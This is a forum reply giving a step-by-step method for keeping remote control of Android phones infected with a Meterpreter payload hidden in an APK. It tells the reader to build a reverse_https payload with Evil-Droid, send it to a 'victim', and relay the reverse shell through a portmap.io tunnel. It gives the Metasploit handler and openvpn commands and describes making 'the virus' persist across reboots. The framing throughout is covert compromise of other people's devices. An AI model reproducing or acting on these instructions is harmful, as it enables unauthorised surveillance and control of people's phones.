Forum Thread: Merged Meterpreter in Apk Android Session Lost

troubleshoot Guys ?

hi

first of all, reverse_https is the best payload. it's less detectable, secure, and you can use a DNS address with it, for example noip or portmap. with reverse_tcp, you can use only an IP address... if your IP changes, you lose your victim forever.

So, my advice to you is this:

Step 1: Create a Portmap Account

Go to portmap.io, create an account, log in and create a new rule/ config. choose the port that you want to forward. I like port 443. Now, download the config file to your computer (I use Kali).

Step 2: Create the Payload

Create a payload using Evil-Droid...set the LHOST=your-portmap-address54376.io and LPORT=54376 (check your portmap account for the correct details). Send the file to your victim.

Step 3: Receive the Connection

Now, open a multi/handler session
set LHOST your-portmap-address54376.io
set LPORT 443 (the port you redirect to on your machine)
set exitonsession false
exploit -j
Finally, open a terminal and type:
openvpn --config your-portmap-config.ovpn (the config file that you downloaded)
Hit Enter.

NB:

What happens exactly? the victim connects to portmap.io, and portmap redirects the meterpreter session to you. So, you don't need to open ports on your router, and that's cool. Your PORTMAP account is for life, doesn't expire.

You don't lose victims, and whenever your victim restarts the phone, you get a meterpreter as long as he keeps the app installed. You can upload a bash script to start the virus periodically. Search for the script online.